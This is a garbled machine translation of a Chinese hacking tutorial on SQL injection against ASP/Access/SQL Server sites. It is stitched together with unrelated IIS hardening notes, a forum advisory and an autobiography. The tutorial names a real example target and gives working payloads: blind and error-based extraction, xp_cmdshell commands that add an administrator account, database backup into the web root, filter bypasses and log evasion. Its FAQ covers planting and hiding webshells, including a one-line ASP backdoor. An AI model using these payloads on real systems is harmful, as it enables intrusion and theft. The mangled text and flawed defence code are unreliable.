SQL injection book - ASP injection vulnerability full contact

xiaoxiao2021-03-06 79

http://www.cnblogs.com/enif/archive/2004/08/11/32146.html (source site)

Author: NB Alliance - Kotake (QQ: 48814)

Speech

With the development of B / S mode application development, programmers who use this model to write applications have become more and more. However, due to the high entry threshold in this industry, the level and experience of programmers are uneven. A considerable part of the programmer does not judge the legality of the user input data when writing code, so that the application has security hazards. Users can submit a database query code, obtain certain data he wants, based on the result returned by the program, which is the so-called SQL INJECTION, that is, SQL injection.

SQL injection is accessed from normal WWW port, and the surface looks with the general web page access, there is no difference in web page access, so the current market firewall will not issue an alert to SQL injection. If the administrator does not view the habit of IIS logs, it may be invaded Will not find out for a long time.

However, the technique of SQL injection is quite flexible, and there will be many unexpected situations when injected. Can you analyze according to the specific situation, construct a smart SQL statement, so that the desired data is successfully obtained, it is the fundamental difference between the master and the "rookie".

According to national conditions, domestic websites use ASP Access or SQLServer to account for more than 70%, PHP MySQ accounts for L20%, and there are less than 10% of others. In this article, we will introduce the approach, advanced to advanced explanation of ASP injection methods and techniques, and PHP injected article written by another friend of the NB Alliance Zwell, I hope to use the security workers and programmers. For friends who know the ASP injection, please do not skip the entry, because some people have misunderstandings about the basic judgment methods of the injected. Are you ready? Let's go ...

Entry

If you haven't tried SQL injection, then the first step will first put the IE menu => tool => Internet option => Advanced => Show friendly HTTP error message to go out. Otherwise, no matter what the server returns, IE is only displayed as an HTTP 500 server error, and more prompt information cannot be obtained.

Section 1, SQL injection principle

Here we start starting from a website www.19cn.com (Note: This article has been approved before the discipline of the station, most of which is real data).

On the homepage of the website, there are "IE can't open a new window" link, the address is: http://www.19cn.com/showdetail.asp? Id = 49, we add this address after this address Single number ', the server will return the following error tips:

Microsoft Jet Database Engine Error '80040e14'

String syntax errors in Query Expressions' ID = 49 ''.

/SHOWDETAIL.ASP, line 8

From this error prompt we can see the following:

1. The website is used by the Access database, connects the database via the JET engine, not through the ODBC.

2. The program does not determine whether the data submitted by the client meets the program requirements.

3. This SQL statement is inquired with a field of ID.

From the above example we can know that the principle of SQL injection is to submit a special code from the client, resulting in the collection of procedures and servers, giving the information you want to get. In the second section, it is determined whether SQL injection can be performed.

After reading the first quarter, some people will feel: I am also often the test can be injected. Is this not very simple?

In fact, this is not the best way, why?

First, it is not necessarily that the IIS of each server is returned to the client. If the program is added to the client, if the program is added, SQL injection is not successful, but the server will also report an error, the specific prompt information is Error on the server when processing the URL. Please contact the system administrator.

Second, some of the programmers who have a little understanding of SQL injection is considered to be safe, this situation is not a few, if you use a single quotation test, it is not an injection point.

So, what kind of test method is more accurate? The answer is as follows:

1 http://www.19cn.com/showdetail.asp?id=49

2 http://www.19cn.com/showdetail.asp?id=49 and 1 = 1

3 http://www.19cn.com/showdetail.asp?id=49 and 1 = 2

This is the classic 1 = 1, 1 = 2 test method, how to judge? See what the three URLs returned above:

Performance of can be injected:

1 Normal display (this is inevitable, otherwise it is wrong)

2 Normal display, content is basically the same as 1

3 prompts BOF or EOF (when the program does not do any judgment), or the record is not found (judge RS.eof), or the display is empty (the program adds an ON Error Resume next)

It is easier to judge if it cannot be injected, and 1 is also normal display, 2 and 3 generally have a program defined error message, or an error occurred during the prompt type.

Of course, this is just the incoming parameter is the judgment method used by the digital type. When actual application, there will be character types and search type parameters, I will analyze the "SQL Injecting General Steps" in the intermediate level.

In the third quarter, judgment the database type and injection method

Different database functions, the injection method is different, so before the injection, we must also judge the type of database. General ASP's most frequently matched databases are ACCESS and SQLSERVER, one of more than 99% of websites online.

How to let the program tell you what database it uses? come and see:

SQLServer has some system variables, if the server IIS prompt is not closed, and SQL Server returns an error prompt, you can get directly from the error information, the method is as follows:

http://www.19cn.com/showdetail.asp?id=49 and user> 0

This sentence is very simple, but it contains the essence of SQLServer's unique injection method. I also found this efficient susceptibility in a unintentional test. Let me see its meaning: First, the front statement is normal, focus on and user> 0, we know, User is a built-in variable of SQL Server, which is the user name currently connected, type NVARCHAR . Take a nVarchar value to the intra 0 comparison, the system will try to turn nvarchar's value to int type. Of course, the process will definitely errors in the process, and SQL Server error prompt is: convert the nVARCHAR value "ABC" conversion data type When INT's column, the syntax error occurs, huh, ABC is the value of the variable user, so that the power of the database is not scrapped. In the subsequent space, everyone will see a lot of statements with this method. By the way, it is well known that SQLServer's user sa is a role of equivominstrators permissions, got SA permissions, almost certainly gets the host's Administrator. The above method can be very convenient to test whether it is logged in with sa, if it is the SA login, the prompt is a column that converts "DBO" into an int to errors, not "SA".

If the server IIS is not allowed to return an error prompt, how do you determine the database type? We can start from Access and SQL Server and distinguish, Access and Sql Server have its own system table, such as storing all objects in the database, Access is in system table [msysObjects], but read the table in the web environment " No permissions, "SQL Server is in the table [sysObjects], which can be read normally in a web environment.

In the case where you can inject, use the following statement:

http://www.19cn.com/showdetail.asp?id=49 and (select count (*) from sysobjects> 0

http://www.19cn.com/showdetail.asp?id=49 and (Select Count (*) from MsysObjects> 0

If the database is SQL Server, the page of the first URL is approximately the same as the original page http://www.19cn.com/showdetail.asp?id=49; and the second URL, because the table MsysObjects is not found, Will prompt an error, even if the program has fault tolerance, the page is completely different from the original page.

If the database uses Access, then the situation is different, the page of the first URL is completely different from the original page; the second URL, depending on whether the database settings are allowed to read the system table, generally not allowed Therefore, it is also completely different from the original website. In most cases, use the first URL to know the database type used by the system, and the second URL only uses authentication when IIS error prompt.

Advancement

In the entry, we learned the judgment method of SQL injection, but truly to get the confidential content of the website, it is not enough. Next, we continue to learn how to get the content you want to get from the database, first, let's take a look at the general steps in SQL injection:

The first section, the general step of SQL injection

First, judge the environment, find an injection point, determine the database type, which is already told in the entry. Secondly, according to the type of injection parameter, the original appearance of the SQL statement is reconstructed in the mind, and the parameter type is mainly divided into the following three:

(A) ID = 49 These injected parameters are digital, SQL statements, is as follows: SELECT * FROM table name Where field = 49 Injection parameters is ID = 49 and [Query Condition], that is, the generated statement: SELECT * From table name where field = 49 and [query condition]

(B) Class = Continuous argument This type of injection is a character type, and the SQL statement is generally approrated: SELECT * FROM table name where FROM table name WHERE field = 'consecutive' injection parameter is class = series' and [query criteria] and '' = ', That is, generating statement: SELECT * FROM table name Where field =' series of series' and "query conditions] and '' = ''

(C) When searching, there is no filter parameters, such as keyword = keyword, SQL statement original is as follows: SELECT * FROM Table Name Where FROM Table Name The parameter of the WHERE Field Like '% Injects is Keyword =' AND [Query Condition] and ' % 25 '=', that is, the generating statement: SELECT * FROM table name Where field Like '%' and [query conditions] and '%' = '%'

Next, replace the query condition into a SQL statement, guess the table name, for example:

ID = 49 and (select count (*) from admin)> = 0

If the page is the same as ID = 49, the additional condition is established, that is, the table admin exists, that is, it does not exist (please keep this method). So loop until you guessed the name.

After guess, replace count (*) into a count (field name), and specifically depends the word name.

Some people will say: There are some casual components here. If the name is very complicated, it will not have to play. It is very pair, this world does not exist 100% successful hacker technology, flies do not seamless eggs, no matter how many technologies, a few hackers, because others are not strict or not, the user is not confidential. I have to get it.

I have a little bit, saying it back, for SQL Server library, there is a way to let the program tell us the name and field name, we will introduce in the advanced article.

Finally, after the table name and column name are successful, use the SQL statement to get the value of the field, and the most common method is described below. Although this method is very slow, it must be feasible Methods.

We will give an example, known in the form of the username field, first of all, we take the first record, test length:

http://www.19cn.com/showdetail.asp?id=49 and (SELECT TOP 1 LEN (UserName) from admin> 0

First: If the UserName length of TOP 1 is greater than 0, the conditions are set; then> 1,> 2,> 3 this test, until the condition is not established, such as> 7 is established,> 8 is not established, that is, Len (username ) = 8 Of course, no one will be stupid from 0, 1, 2, 3 one test, how to see each play. After obtaining the length of the username, the nth character is intercepted with MID (username, n, 1), and then ASC (MID (UserName, N, 1)) Gets the ASCII code, such as:

ID = 49 and (SELECT TOP 1 ASC (MID (username, 1, 1)) from admin)> 0

It is also the ASCII code of the first character using the step-by-step range, pay attention to the English and digital ASCII code between 1-128, can be used to speed up the guess, if the program test is written, the efficiency will have extreme Large improvement.

In the second section, SQL injection common functions

People with SQL language bases, the success rate is much higher than those who are not familiar during SQL injection. We must improve our SQL level, especially some common functions and orders.

Access: ASC (Character) SQLServer: Unicode (Character)

Role: Return to a character's ASCII code

Access: chr (Digital) SQLServer: nchar (number)

Role: In contrast to ASC, return characters according to ASCII code

Access: MID (String, N, L) SQLServer: Substring (String, N, L)

Role: Returns the string from the N-character starting a sub-string of the length L, ie the string between N to N L

Access: ABC (Digital) SQLServer: ABC (Digital)

Role: Return to the absolute value of the number (it will be used when guess the Chinese characters)

Access: a Between B and C SQLServer: a betWeen B and C

Role: Judgment a bound between B and C

Section III, Chinese processing method

In the injection of the Chinese characters are common things, some people want to fight back in the Chinese characters. In fact, as long as you know Chinese coding, "Chinese phobia" can quickly overcome.

Let's talk about a little common sense:

In Access, the Chinese ASCII code may have a negative number. After removing the negative, the absolute value is taken with ABS (), the Chinese characters are unchanged.

In SQL Server, Chinese ASCII is positive, but since it is a two-bit encoding of Unicode, the ASCII code cannot be obtained using a function ascii (), and the function unicode () must be used to return the corresponding Chinese character with the nchar function.

After understanding the two points above, if you think Chinese guess is actually almost the same as English? In addition to the function of use, it is important to pay attention to the specification, the method is nothing wrong.

High-level articles

After reading the entry and advanced articles, it is no problem to crack the general website. But if you can't touch the name of the table name, or how the author is filtered with some special characters, how to improve the success rate of injection? How to improve the guess efficiency? Let everyone look down in the high-end.

In the first section, use the system table to inject the SQLServer database

SQLServer is a powerful database system that has a close contact with the operating system, which brings great convenience to developers, but on the other hand, it also provides a springboard for the injection, let's take a look at several Specific example: 1 http://site/url.asp? Id = 1; exec master..xp_cmdshell "Net user name password / add" -

Sequel; in SQL Server, the two sentences are separated, - indicates that the following statement is a comment, so this statement will be divided into two sentences in SQL Server, first, SELECT Id = 1 record, then execute storage Process XP_cmdshell, this stored procedure is used to call the system command, so use the NET command to create a new user name name Name, password is the Windows account number, then:

2 http: //site/url.asp? Id = 1; exec master "NET localgroup name administrators / add" -

Join the new account Name to the administrator group, don't have to be used, you have already got the system's highest permission! Of course, this method is only applicable to the case where the database is connected to the SA, otherwise, there is no permission to call XP_cmdshell.

3 http://site/url.asp? Id = 1 and db_name ()> 0

There is a similar example and user> 0, and the role is to obtain the connection user name, DB_NAME () is another system variable, returning is the connected database name.

4 http: //site/url.asp? Id = 1; Backup Database Database name to disk = 'c: /inetpub/wwroot/1.db'; -

This is a quite a trick, from 3 database name, plus some IIS error exposed absolute path, back up the database back to the web directory, and use HTTP to complete the entire database, complete the entire download, All administrators and user passwords are unfair! When you don't know the absolute path, you can also back up the method of the network address (such as //202.96.xx.xx/share/1.db), but the success rate is not high.

5 http://site/url.asp? Id = 1 and (select top 1 name from sysobjects where xtype = 'u' and status> 0)> 0

As mentioned earlier, sysObjects is the system table of SQL Server, stores all the table names, views, constraints, and other objects, Xtype = 'u' and status> 0, indicating the table name created by the user, the above statement will be the first table. The name is taken out, and the 0 is relatively small, so that the error message is exposed to the table name. Second, how to get the third table name? Or leave our smart readers think.

6 http://site/url.asp? Id = 1 and (select top 1 col_name (Object_ID ('Name'), 1) from sysobjects> 0

After getting the table name from 5, use Object_ID ('Name') to get the internal ID, col_name (Name ID, 1) of the table name, represent the first field name of the table, change 1 to 2, 3, 4 ... You can get the field name inside the guess table one by one.

The above 6 points is that I have studied SQL Server injection of hardcore crystals, it can be seen that the degree of understanding of SQL Server directly affects success rate and guessing speed. After I study SQLServer injection, I also got a lot of improvement in development, huh, maybe safety and development was completed. In the second section, bypass the program limit continues to inject

In the entry, there are many people like to use the 'number test into the vulnerability, so there are many people who use the filter' to "prevent" to inject vulnerabilities, which may block some entry of the entry, but familiar with SQL injection People can still use the related functions to achieve the purpose of bypassing the program.

In the "SQL Injection" section, the statements I have use have been optimized, so that they do not include single quotes; in the "Using the System Table Inject into the SQLServer Database", some statements contain a 'number, We will give an example to see how to transform these statements:

Simple, like WHERE XTYPE = 'u', the ASCII code corresponding to the character u is 85, so you can use where xtype = char (85) instead; if the character is Chinese, such as where name = 'user', you can use where name = Nchar (29992) NCHAR (25143) instead.

Section III, experience summary

1. Some people will filter these keywords such as select, update, delete, but forget to distinguish case sensation, so everyone can try it with SELECT.

2. When you can't guess the field name, you may wish to look at the login form on the website. Generally, the field name is the same name with the form of the form.

3. Special Note: The number incorporated in the address bar is interpreted as space, the% 2B is interpreted as number, and the% 25 is explained to the% number, and the specific introduction can be referred to URLENCode.

4. When injecting with GET method, IIS will record all your submission strings, do not record the POST method, so you can use the POST's URL to try not to use GET.

5. Instest the use of ASCII checking method, SQL Server can also use this method, only the difference between the two can only be exposed, but if the value of the error information can be exposed, that efficiency and Accuracy will have great improvements.

Defense method

SQL injection vulnerabilities can be described as "a thousand miles of embankments, collapsed in the ant hole", which is extremely common online, usually because the programmer does not understand, or the program is not strict, or a parameter is forgotten. Here, I will give you a function, instead of the Request function in the ASP, can inject SAY NO to all SQL, the function is as follows:

Function SafeRequest (PARANAME, PARATYPE) '--- Incoming Parameters ---' PARANAME: Parameter Name - Characteristic 'Paratype: Parameter Type - Digital (1 means the above parameters are numbers, 0 means the above parameters are character)

Dim Paravalue Paravalue = Request (paraName) if parates = 1 Then if not isnumeric (Paravalue) Then response.write "& paraName &" must be digital! "Response.end end if else paravalue = replace (paravalue," "," '") End if safequest = ParavalueEnd Function article is over, whether you are a security personnel, technical enthusiasts or programmers, I hope this article can help you. If you have any questions or want to discuss related questions, welcome to www.54nb.com, thank you!

-------------------------------------------------- ----------------------------- Description: Use the NBSI-NB Alliance SQL Injection Analyzer to detect various SQL injection vulnerabilities and Decoding, improve the efficiency of guessment. Copyright: This article is my original series of articles, starting from www.54nb.com, welcome to reproduced, please keep copyright information, please contact me before the media magazine reprint.

-------------------------------------------------- ---------------------

This version of FAQ and novice must read, new friends please see

1.NBSI is not universal, don't expect NBSI to guess 100% station, even if the manual guess is not going to guess. If NBSI can guess, it can't be guilty. Your injection has not gone yet

2. Don't use it as a place to find a hacking website. If you have any questions during the trial,, even if it is put forward, pay attention to the details, the injection is a technology that needs to judge a lot of environments.

3. Don't try to put the URL to let others teach you from the head to the tail, don't try to ask a few papers to answer the problem, after, for example, "How to get the website" "How to get Webshell" I will delete it directly.

4. Don't send a short message, let me help you, this is impossible, don't waste each other.

5. Don't publish a post such as "UP" "Top", if you think the article is well written, talk about where you feel, not a top sticker.

6. It is best to look at the following usual questions before posting, so as not to shoot tiles:

(1) Q: What is SQL injection answer: http://nb.unionbyte.com/view.asp? Postid = 1457033

(2) Q: This situation can not be injected into Microsoft VBScript runtime error error '800A000D' type mismatch: 'clng' (or type does not match: 'cint')

A: The parameter has been filtered, although it is not very friendly, but it can't be injected.

(3) Q: Is there any way to get a horse on the website after the website background management privileges? What way! A: I can find something to upload, I can see the ASP Trojan. SQLServer must get an absolute path, then you can generate with tools such as NBWS.

(4) How to break this MD5 (such as AB2A34FDF3FD232)? A: At present, MD5 can only be a violent crack, please do not call others to break. Go to download the tool yourself to break. Tool here http://nb.unionby.com/view.asp?postid=1457924

(5) Q: Prevent SQL injection is good! A: From the numbers, characters, search and prevention. Detailed to prevent this function of Xiaozhu, FUNCTION SAFEREQUEST (PARANAME, PATYPE) '--- Incoming Parameters ---' paraName: Parameter Name - Character 'Paratype: Parameter Type - Digital (1 means the above parameters are numbers, 0 Indicates the above parameters as characters) DIM ParaValue Paravalue = Request (paravent) if parates = 1 Then if not isnumeric (Paravalue) Then response.write "" & paraName & "must be digital!" Response.end end if else Paravalue = Replace (Paravalue, "'", "'") End if Saferequest = ParavalueEnd Function

(6) Q: How can the Trojans have been hidden after passing: From the perspective of the administrator, you can write into the document he is not used. Uncommon to see, often is safe in files. Or write a sentence, Trojan <% if Request ("x")> "" "" "" x ")%>

(7) Q: I got the unicode code of the character, but I don't know how to restore it into a character. Answer: SQL Server Nchar or VB's ChRW can restore

(8) Q: Download the database but not find the background answer: Find the latter without shortcut, continue to find, or try another way.

_________________________________________________

Net 7.0 win2003 and configuration issues Author: Unknown Source: Unknown Add Time: 2004-6-21 Forum Forum a period of time can not be opened but other WEB pages are depressed need to open each time before they can restart IIS access

Thanks to XFXP to tell me that the following is his answer I have resolved after the modification is configured.

RE: What is conflict between 7.0 and IIS? I closed the RPC error in 2003 and the IIS error debug was completely normal. Now I am as good as 2000, and there is still the remote connection of the SQL database if it is not necessary, sometimes it will cause RPC errors.

RE: What is conflict between 7.0 and IIS? Inside the service, Remote Procedure Call (RPC), the default is the error restart, change it to not execute

Another one is IS5.0 error to debug, turn it off.

In addition, it is best to install Java virtual machine, Win2003 does not own

RE: What is conflict between 7.0 and IIS?

Configure IIS to IIS 5.0 Isolation mode

In the IIS Manager, expand your local computer, right-click on "Site", and then click Properties.

Click the Services tab, select the "Run the WWW Service in IIS 5.0 Isolation mode" check box, and then click OK.

Under ______________________________________________________win2K configuration asp cgi php mysql Raiders Author: Unknown Source: Unknown Joined: 2004-6-21

InDexing Service, FrontPage 2000 Server Extensions, Internet Service Manager (HTML), there are some other, in short, unloaded. (According to safety principles, least service minimum permissions = maximum security.)

First, open the Internet Manager (Start -> Program -> Management -> Internet Service Management) If you installed on the top, there is a default site and a SMTP service item to select the default site, remove all the following table of Contents. (Press the DELETE button on your keyboard) to stop IIS, the simplest method: Start -> Run -> Enter net stop iisadmin Select Y Enter (started commands: NET Start W3SVC) Put the C disk INETPUB The directory completely deletes (after stopping IIS can be deleted), in other discs, create a directory in IIS Manager to point the main directory of the default site to the new directory, if you need any permissions, you can build it, what need? What is the right to open? (Special paying attention to writing permissions and executing programs, there is no absolute need to be given, the default is not given, so you don't have to study, huh, huh ..)

Application Configuration: Remove any useless mappings outside the IIS Manager, leave ASP, ASA, and other file types you really need to use, (except CGI, PHP, other, I think you are useless, delete HTW, htr, idq, ida ...) I don't know where to delete it? ? Method: Open Internet Service Management -> Select Site -> Properties -> WWW Service -> Edit -> Home> Configuration -> Application Mapping, then start one by one to delete it (without all the best, true trouble). The script error message will then be changed to send text in the application tutoring of that window (unless you want the ASP error, the user knows your program / network / database structure) error text written? Just like you like it, look at it. Don't forget to let the virtual directory inherit the properties you set when you click OK.

In order to deal with increasing CGI vulnerability scanner, there is a small tip that can be referred to in IIS, and the HTTP404 Object Not Found error page will be redirected to a custom HTM file via URL, which can make the most CGI vulnerability scanner fail. In fact, the reason is very simple. Most CGI scanners are written for convenience. By checking if the HTTP code returns to the page is existing, for example, the famous IDQ vulnerability is generally verified by taking 1.IDQ, if Returns to HTTP200, it is considered to have this vulnerability, and vice versa if it returns HTTP404, if you reform the HTTP404 error message to the http404.htm file via URL, all scans return HTTP200, 90% The CGI scanner will think that you have any vulnerabilities. The result is that your true vulnerability is covered, so that the invaders are nowhere to start, but from the perspective, I still think that it is triggered to do safety settings than such tips. More important.

Win2000 account security is another focus. First, Win2000's default installation allows any user to get all the account / sharing lists through empty users, this original is to facilitate local area network users to share files, but a remote user can get your user List and crack user passwords with violence. Many friends know that can ban 139 empty connections can be disabled by changing registry local_machine / system / currentcontrolset / control / lsa-restrictanonymous = 1, actually Win2000 local security policy (if it is domain server is in domain server security and domain security policies There is such options restrictanonymous (additional limit for anonymous connection), this option has three values: 0: None. Rely on default permissions (no, depending on the default permissions) 1: do not allow Enumeration of Sam Accounts and Shares Not allowed to enumerate SAM account and share) 2: No Access WITHOUT EXPLICIT Anonymous Permous Permouss (no explicit anonymous permission is not allowed) 0 This value is the system default, what limit is not, remote users can know all your machines Account, Group Information, Shared Directory, Network Transfer List (NetServertransportenum, etc.) This setting is very dangerous to the server. 1 This value is only non-null user access SAM account information and sharing information. 2 This value is in Win2000 It is supported by it. If you use this value, your sharing is all finished, so I recommend you to 1 is better. Ok, invaders have no way to get us now. User list, our account is safe ... slow, there is at least one account is a password, this is the system built-in Administrator, what should I do? I changed, in computer management -> User account Administrator then renamed, change what casters, as long as you can remember it. After changing the super management user name, you can also see it in the Terminal Service login interface (you log in, you have remember), modify the method: Run Regedit, find the Don't Display Last User Name string data in HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / WindowsNT / CURRENTVERSION / WINLOGON item, so that the system does not automatically display the last login user name.

For security, you can also open TCP / IP filter, right-click on the desk, right-click on the network -> Properties -> Right click on the NIC you want to configure -> Properties -> TCP / IP-> Advanced -> Options -> TCP / IP Filter Here there is three filters, which are: TCP ports, UDP ports, and IP protocol TCP ports, click "Allow", then add the port you need to open, in general, the web server only needs to open 80 (WWW) The FTP server needs to open 20 (FTP DATA), 21 (FTP Control), 3306 (Mysql), 3389 (remote terminal control, if your host hosts in other rooms, you can't do it directly, you need this) mail server may need Open 25 (SMTP), 110 (POP3), I have no research on the port, but if you provide this article, you only have to open a few. (80, 20, 21, 25, 3306, 3389) - CGI support

Download ActivePerl (you can download the latest version of www.perl.com)

1, decompression, run install.exe, default is installed under C: / Perl, but for convenience, please install it to the C: / usr directory, (so you can use it directly to write the PERL interpreter).! / USR / BIN / Perl can be consistent with the stand-alone environment and the network environment path. Press Y.) 2, after installing, follow these three steps to modify the registry: Run Reedit, search: hkey_local_machine / system / CurrentControlSet / Services / W3SVC / Parameters / ScriptMap / key name, then add key name: ". Cgi", key value: "c: /usr/bin/perl.exe% s" and key name: ". Pl" Key value: "c: /usr/bin/perl.exe% s" (do not know how to build? So: In the box ---> Right button ---> New -> string value name Change to .cgi, double-click the key to enter numerical data, which is the key value mentioned above), because the host is to support PHP, so it adds support here to PHP and PHP3 (in the new site, save time) Add key name ".php", key value: "C: / php/php.exe% S% S" Add key name ".php3", key value: "c: / php/php.exe% s% s" OK, take effect after restart! CGI supports! After the new site is created, the application configuration will be added to PHP and CGI support (not to delete this permission). CGI support!

--Mysql support

Download mysql (you can download the latest version) for www.mysql.com)

1, decompression, run setup.exe fully installed, the default installation path is: C: / mysql; 2, after the installation is complete, "Run" in the Start button, enter the command: c: / mysql / bin / mysqld- Nt.exe --install, and execute; 3, start-> program -> management tool -> service -> find mysql -> boot it; 4, MySQL installation is complete, restart Win2000 5, turn it on C: /mysql/bin/winmysqladmin.exe, when using it for the first time, the administrator name and password are required, set the username and password, and after setting, the system tray will appear a "traffic light" small icon (later The system is automatically loaded when the system starts). 6, ok, mysql support to get! - PHP support

Download PHP (you can download the latest version of www.php.com)

1. Unzip PHP 4.0.4 to C: / PHP; 2, copy the php.ini-dist file within the PHP directory to the Winnt directory, renamed it is php.ini; (this is the PHP configuration file, no need to change Operation, I didn't study it carefully) 3. To modify the php.ini file content as needed, if you want to use the session feature, create a C: / TMP directory, and set the value of the session.save_path in the php.ini document to an absolute path: C: / TMP; 4, copy the php4ts.dll file within the PHP directory to the WinNT / System32 directory; 5, start "Internet Service Manager" (IIS) in the management tool in the control panel; 6, open the site attribute In the 'ISAPI Filter' option, add a new filter, use 'php' as the filter name, fill in PHP4isapi.dll and its path in the Executable File column (C: / PHP / SAPI / PHP4isapi) .dll). 7. Enable the default document "in the" Document "option in the" INDEX.PHP "; _________________________________________________________________________________________________________________________________________________________________________________________________________________________________

Screen 7.0 SP2 is surprisingly vulnerable, please pay attention! Author: Unknown Source: Unknown Add Time: 2004-5-19 Recently, many domestic users Dongwangluntan discovered vulnerabilities, please note that each webmaster and official concern Action Network, promptly beat up. Current Solution: Turn off user upload function. Delete or rename two files in REG_UPLOAD.ASP and Upfile.asp under the directory of the forum. The vulnerability is highly harmful, and the webmasters are highly valued and closely pay attention to the official website. Official patch has been out, please download update: http://www.luntan.com.cn/soft/2386.htm

____________________________________Sql INJECTION --- SQL Injection

Infiltrate penetration

____________________________________________________________________________  Some friends know the knowledge of web technology is not a lot, and some nouns are often confused. Here, summarize:

1, Java, JavaScript and JScript.  First, these three do not necessarily contact, they are completely different things, they are developed by different companies, and there are many different places, and there are many differences. Java is created by Sun Company; JavaScript is a product developed by Sun and Netscape; JScript is a Microsoft's implementation of ECMA262 language norms. The common point of these three is that the syntax is similar to the C language. JS is a referusion of JavaScript. JScript is applied to the ASP and runs on the server side. Java, JavaScript is running on the client. Sun launched JSP later, running on the server based on Java language. The webpage running on the server is a dynamic web page, so aspcript based on JScript, Java-based JSP is a dynamic web page, while Java, JavaScript is a static web page. 2, static web, dynamic web page.  Procedure is running on server-side, is an important logo. Programs running on the server, web pages, components belong to dynamic web pages, which will return different web pages with different customers, different times, such as ASP, PHP, JSP, ASP.NET, CGI, etc. Programs, web, plug-ins, components running on the client, are static web pages, such as HTML pages, flash, javascript, vbscript, etc., they are never changed.

3, VB and VBScript.  There are few friends called VBScript as VB, which is wrong. VB is the abbreviation of Visual Basic, applied to software development. Vbscript is an abbreviation for Microsoft Visual Basic Scripting Edition, applied to the client web page, or the server-side ASP page (ASP language is based on VBScript or JScript). VB and VBScript common are syntax, the function is the same, developed by Microsoft.  Typically, VBScript is referred to as VBS. Unfortunately, some web-viruses now use the VBScript script. _____________________________________________________ [自自] 人生 11 years

The program is tired, and it is also written in the entertainment.

The first contact with the computer is 93 years in Thirteenth March, Dad spent more than 4,000 yuan to buy a platform 386SX 25, and then force me to learn five pens (I can only practice the article, not like the current child. At QQ Bubble MM Exercise), at that time I felt that the computer was a very boring thing, I didn't expect to make a living today.

After more than half a year, I only learned some basic knowledge of DOS. DOS can only use the basic memory of 640K, so often for a few k memory flowers, a lot of time to write config.sys, this repeated installation system After one year of configuring the system, I finally became a DOS master.

DOS has no thing, you can play, you start watching the program, the Basic function is too small, C and compilation are not very understanding, only that foxbase is not too difficult to play, it may be destined to have a database for the database. Let's learn more than two years, you can write some small database management system.

Before learning the computer, I have played stocks. Later, I bought a stock receiver in my home. I can see the real-time market at home. Soon, I will receive the message to the message. As soon as I look at it, I originally the DBF format, I only changed an extension, so I immediately started the storage format of the stock analysis system. At that time, there is no network, there are a few people around you. Everything can only rely on themselves, and then develop a habit of making brains. Through a constant conversion study, you can clear the storage format of the stock analysis system, use two or three days, a conversion program is released, and a month can save 60-80 yuan. . After running for a while, the situation was good, and later, this system also sold two or three sets. Although only a few hundred pieces, I was enough for me. I started the Internet in 98, I paid two months long-distance calls. I finally learned that "Irrigation" on BBS, that is, "Irrigation", "Irrigation", there are few people in the Internet, but the people on the Internet are very pure . Today, I met a lot of masters, including the current Tencent Lao Tong Ma Huateng, said Ponyma, I really admire him, five years ago, he took the stock of 700,000 to create Tencent, no one thought of it. At this stage, his courage is really we look like.

After the college entrance examination, successfully launched the Guangxian, start learning to do a page, learn a little Photoshop, FrontPage, think you are still not suitable for these emotions, or the program is more suitable for me, because I am going to learn CGI, just learn, my classmates tell me Microsoft has a kind of statement called ASP, like a lot better than CGI, so I will transfer ASP, because I have written for two or three years, I have more convenient to find information, and write a counter, one. Month can write a message and the like. Of course, it seems that the code is very naive at that time.

Four years, there are not many things that truly learn, but the knowledge of the database and management information system has played a lot of role in my current path. I have a book for the book before, I am very Can be applied to the actual in the actual, not like most classmates, I will give the teacher. So what website or projects have to do it, I will find me to help, I have two benefits to the teacher, because the system of the teacher is designed according to the standardized process, and you can learn a lot of things, another Aspect is not afraid of the test, huh, this is a secret that is not a secret in many schools.

Because of this, it is very smooth to find a job when graduating from graduation, I have entered the first company, I feel that everything is very different from the previous imagination, no matter how capacity you have, the company doesn't need you to do it best, but You have the highest efficiency. In the first company for a year, what you can learn is getting less and less, so I changed a working environment, I entered a company that made ERP development, the treatment is OK, and the company's master Quite very much. However, ERP development is indeed a very cost-effective job. The whole system has more than 600 tables, 9700 fields, and 25 modules. It is less than half of the lot about more than a year.

It will not be very busy in this company, so you can often chat with people on the Internet and exchange technology. Last year, I wandered online, because a sticker was unknone with Starlove and Fcuandy, but I didn't think about it. I found that they all got all right, and like me, it is a very persistent person, later I have met 5945, Jadesun, pure life, cool, national brothers, everyone talked very speculative, organized an irrigation company, which is the current NB Alliance. Nb was established in the early stage, in the loose tissue status, Irrigation water chat technology, until later, the administrator of the network was rubbed, and why did you help others play advertisements? We can use your own Technical advantages have commercialized alliances. After a period of exploration, NB's products have been launched one by one, and the popularity of the alliance is also growing. I believe that one day, people who move the network will find that they have created a strong competitor.

I spent such a long period of introduction NB, maybe because I think, NB is the hope of my present and future, is the pin that I am proud.

The water account will be remembered here, and the road is still very long, no one can predict the future, but everyone will hopes that tomorrow will be more brilliant, I am no exception.

___________________________________________________ 本版 f 及必, new friends, please see